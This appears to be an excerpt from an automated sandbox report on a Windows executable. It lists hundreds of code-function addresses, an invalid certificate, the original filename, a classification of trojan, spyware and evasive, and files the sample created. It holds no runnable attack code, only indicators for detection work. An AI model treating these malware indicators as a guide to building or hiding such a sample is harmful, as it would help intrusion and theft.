            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F091B83_2_35F091B8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F036B93_2_35F036B9
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0E7B93_2_35F0E7B9
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0A9A03_2_35F0A9A0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F066A03_2_35F066A0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F091A73_2_35F091A7
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F02DA83_2_35F02DA8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0D4A83_2_35F0D4A8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F056A93_2_35F056A9
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F061A93_2_35F061A9
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0EC903_2_35F0EC90
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0D4973_2_35F0D497
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F04D983_2_35F04D98
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F07E983_2_35F07E98
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F02D9A3_2_35F02D9A
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F012803_2_35F01280
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F096803_2_35F09680
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0EC813_2_35F0EC81
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F024883_2_35F02488
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0C1883_2_35F0C188
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F04D893_2_35F04D89
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F07E893_2_35F07E89
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0A98F3_2_35F0A98F
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0D9703_2_35F0D970
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F024773_2_35F02477
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F044783_2_35F04478
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F06B783_2_35F06B78
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0C1783_2_35F0C178
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F009603_2_35F00960
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F083603_2_35F08360
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0D9603_2_35F0D960
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F044673_2_35F04467
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F01B683_2_35F01B68
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0AE683_2_35F0AE68
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F06B6A3_2_35F06B6A
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0126F3_2_35F0126F
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0966F3_2_35F0966F
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0C6503_2_35F0C650
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F009503_2_35F00950
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F083503_2_35F08350
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F03B583_2_35F03B58
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0F1583_2_35F0F158
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F01B583_2_35F01B58
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0AE583_2_35F0AE58
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F000403_2_35F00040
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F070403_2_35F07040
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0C6413_2_35F0C641
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0F1473_2_35F0F147
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F09B483_2_35F09B48
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F03B483_2_35F03B48
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0B3303_2_35F0B330
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F05B373_2_35F05B37
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0DE383_2_35F0DE38
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F09B383_2_35F09B38
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0F6203_2_35F0F620
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F032273_2_35F03227
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F052283_2_35F05228
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F088283_2_35F08828
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0DE283_2_35F0DE28
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0702F3_2_35F0702F
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F017103_2_35F01710
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0A0103_2_35F0A010
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0F6103_2_35F0F610
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0CB163_2_35F0CB16
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F029183_2_35F02918
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0CB183_2_35F0CB18
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F052183_2_35F05218
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F088193_2_35F08819
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0B31F3_2_35F0B31F
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0E3003_2_35F0E300
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F017013_2_35F01701
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F000063_2_35F00006
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F049083_2_35F04908
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F075083_2_35F07508
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F0290A3_2_35F0290A
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F2D0D03_2_35F2D0D0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F26A803_2_35F26A80
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F2E8083_2_35F2E808
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F28BF33_2_35F28BF3
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F25DF03_2_35F25DF0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F2E7FB3_2_35F2E7FB
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F22BF83_2_35F22BF8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F241E03_2_35F241E0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F20FE03_2_35F20FE0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F241D13_2_35F241D1
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F257C03_2_35F257C0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F225C03_2_35F225C0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F2CDC13_2_35F2CDC1
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F20FCF3_2_35F20FCF
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F225B03_2_35F225B0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F257B03_2_35F257B0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F277B03_2_35F277B0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F23BA03_2_35F23BA0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F209A03_2_35F209A0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F29DA93_2_35F29DA9
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F209903_2_35F20990
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F23B903_2_35F23B90
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F26D903_2_35F26D90
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F251803_2_35F25180
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F21F803_2_35F21F80
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F2B9813_2_35F2B981
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F293883_2_35F29388
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F251703_2_35F25170
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F267603_2_35F26760
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F235603_2_35F23560
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F203603_2_35F20360
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F21F6F3_2_35F21F6F
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F203503_2_35F20350
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F267513_2_35F26751
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F24B403_2_35F24B40
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F219403_2_35F21940
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F2A5403_2_35F2A540
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F24B313_2_35F24B31
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F2CB393_2_35F2CB39
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F261203_2_35F26120
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F22F203_2_35F22F20
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F29B203_2_35F29B20
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F2192F3_2_35F2192F
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F261103_2_35F26110
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F2C1193_2_35F2C119
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F245003_2_35F24500
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F213003_2_35F21300
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F291003_2_35F29100
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F22F0F3_2_35F22F0F
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F212F03_2_35F212F0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F244F13_2_35F244F1
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F2B6F83_2_35F2B6F8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F25AE03_2_35F25AE0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F228E03_2_35F228E0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F228D03_2_35F228D0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F2ACD83_2_35F2ACD8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F23EC03_2_35F23EC0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F20CC03_2_35F20CC0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F2D0C03_2_35F2D0C0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F27CC13_2_35F27CC1
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F25ACF3_2_35F25ACF
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F23EB03_2_35F23EB0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F2C8B03_2_35F2C8B0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F2A2B83_2_35F2A2B8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F254A03_2_35F254A0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F222A03_2_35F222A0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F272A13_2_35F272A1
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F20CAF3_2_35F20CAF
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F2BE903_2_35F2BE90
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F254913_2_35F25491
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F298993_2_35F29899
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F238803_2_35F23880
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F206803_2_35F20680
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F2228F3_2_35F2228F
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F238703_2_35F23870
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F206703_2_35F20670
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F2B4703_2_35F2B470
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F28E793_2_35F28E79
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F24E603_2_35F24E60
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F21C603_2_35F21C60
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F26A6F3_2_35F26A6F
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F21C503_2_35F21C50
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F24E513_2_35F24E51
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F284593_2_35F28459
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F232403_2_35F23240
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F200403_2_35F20040
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F264403_2_35F26440
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F232303_2_35F23230
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F264303_2_35F26430
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F2003A3_2_35F2003A
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F27A393_2_35F27A39
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F248203_2_35F24820
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F216203_2_35F21620
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F2C6283_2_35F2C628
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F296133_2_35F29613
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F216103_2_35F21610
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F270193_2_35F27019
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F25E003_2_35F25E00
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F22C003_2_35F22C00
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F2BC093_2_35F2BC09
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F2480F3_2_35F2480F
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F37FA83_2_35F37FA8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3F9883_2_35F3F988
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3F6683_2_35F3F668
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F318283_2_35F31828
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F321F13_2_35F321F1
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3A1F93_2_35F3A1F9
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3D3F83_2_35F3D3F8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F36DE03_2_35F36DE0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3B7E83_2_35F3B7E8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F385E83_2_35F385E8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3E9E83_2_35F3E9E8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F347E83_2_35F347E8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F309D03_2_35F309D0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F385D73_2_35F385D7
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3E9D73_2_35F3E9D7
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3B7D83_2_35F3B7D8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F309C13_2_35F309C1
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F363C03_2_35F363C0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F39BC83_2_35F39BC8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3CDC83_2_35F3CDC8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3CDB83_2_35F3CDB8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F333A83_2_35F333A8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3E3A83_2_35F3E3A8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3B1A83_2_35F3B1A8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3B1973_2_35F3B197
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F37F993_2_35F37F99
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3E3993_2_35F3E399
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F34F803_2_35F34F80
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3C7883_2_35F3C788
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F395883_2_35F39588
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3957A3_2_35F3957A
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3F97A3_2_35F3F97A
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3C7793_2_35F3C779
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F375783_2_35F37578
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F345613_2_35F34561
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F313603_2_35F31360
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F31F683_2_35F31F68
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3AB683_2_35F3AB68
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3DD683_2_35F3DD68
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3DD593_2_35F3DD59
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F36B583_2_35F36B58
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3AB583_2_35F3AB58
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F33B413_2_35F33B41
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3C1483_2_35F3C148
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F38F483_2_35F38F48
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3F3483_2_35F3F348
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3134F3_2_35F3134F
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3C1373_2_35F3C137
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F38F383_2_35F38F38
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3F3383_2_35F3F338
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F331203_2_35F33120
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3D7283_2_35F3D728
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3A5283_2_35F3A528
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F37D123_2_35F37D12
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3D7173_2_35F3D717
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3A5183_2_35F3A518
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F327003_2_35F32700
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3ED083_2_35F3ED08
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F305083_2_35F30508
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F389083_2_35F38908
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3BB083_2_35F3BB08
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F372F13_2_35F372F1
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F304F73_2_35F304F7
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F388F73_2_35F388F7
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3ECF73_2_35F3ECF7
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3BAF93_2_35F3BAF9
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F34CF83_2_35F34CF8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3D0E83_2_35F3D0E8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F39EE83_2_35F39EE8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F368D03_2_35F368D0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3D0DA3_2_35F3D0DA
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F342D83_2_35F342D8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F39ED83_2_35F39ED8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F31CDF3_2_35F31CDF
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3B4C83_2_35F3B4C8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F382C83_2_35F382C8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3E6C83_2_35F3E6C8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F35EB13_2_35F35EB1
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F338B93_2_35F338B9
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3B4B93_2_35F3B4B9
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3E6B93_2_35F3E6B9
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F382B83_2_35F382B8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3FCA83_2_35F3FCA8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3CAA83_2_35F3CAA8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F398A83_2_35F398A8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F354903_2_35F35490
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3FC973_2_35F3FC97
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3CA9A3_2_35F3CA9A
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F30E983_2_35F30E98
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F32E983_2_35F32E98
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F398983_2_35F39898
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F30E893_2_35F30E89
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3E0883_2_35F3E088
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3AE883_2_35F3AE88
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F34A703_2_35F34A70
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3AE7A3_2_35F3AE7A
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F324783_2_35F32478
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3E07C3_2_35F3E07C
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3C4683_2_35F3C468
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F392683_2_35F39268
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F370683_2_35F37068
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F340503_2_35F34050
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3C4573_2_35F3C457
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3F6593_2_35F3F659
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F392583_2_35F39258
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F300403_2_35F30040
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3A8483_2_35F3A848
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3DA483_2_35F3DA48
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F366483_2_35F36648
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F336303_2_35F33630
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3A8393_2_35F3A839
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3DA393_2_35F3DA39
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F35C293_2_35F35C29
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3F0283_2_35F3F028
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F38C283_2_35F38C28
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3BE283_2_35F3BE28
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F32C113_2_35F32C11
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F38C1A3_2_35F38C1A
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F318183_2_35F31818
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3F0183_2_35F3F018
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F300063_2_35F30006
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F352083_2_35F35208
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3D4083_2_35F3D408
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_35F3A2083_2_35F3A208
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_360B36F03_2_360B36F0
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_360B14703_2_360B1470
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_360B30083_2_360B3008
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_360B1B503_2_360B1B50
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_360B22383_2_360B2238
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_360B0D883_2_360B0D88
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_360B4BC73_2_360B4BC7
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_360B29203_2_360B2920
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_360B36E13_2_360B36E1
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_360B14673_2_360B1467
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_360B1B3F3_2_360B1B3F
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_360B22293_2_360B2229
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_360B00063_2_360B0006
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_360B00403_2_360B0040
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_360B2FF83_2_360B2FF8
            Source: C:\Users\user\Desktop\________.exeCode function: 3_2_360B0D783_2_360B0D78
            Source: C:\Users\user\Desktop\________.exeCode function: String function: 00402B3A appears 47 times
            Source: ________.exeStatic PE information: invalid certificate
            Source: ________.exe, 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametipning husnummers.exe< vs ________.exe
            Source: ________.exe, 00000003.00000000.1614671770.0000000000453000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametipning husnummers.exe< vs ________.exe
            Source: ________.exe, 00000003.00000002.3954718526.000000000261F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ________.exe
            Source: ________.exe, 00000003.00000002.3975218220.0000000032977000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs ________.exe
            Source: ________.exeBinary or memory string: OriginalFilenametipning husnummers.exe< vs ________.exe
            Source: ________.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/9@7/5
            Source: C:\Users\user\Desktop\________.exeCode function: 1_2_004045CA GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_004045CA
            Source: C:\Users\user\Desktop\________.exeCode function: 1_2_0040206A CoCreateInstance,1_2_0040206A
            Source: C:\Users\user\Desktop\________.exeFile created: C:\Users\user\AppData\Local\foreslaaendeJump to behavior
            Source: C:\Users\user\Desktop\________.exeMutant created: NULL
            Source: C:\Users\user\Desktop\________.exeFile created: C:\Users\user\AppData\Local\Temp\nsaD100.tmpJump to behavior
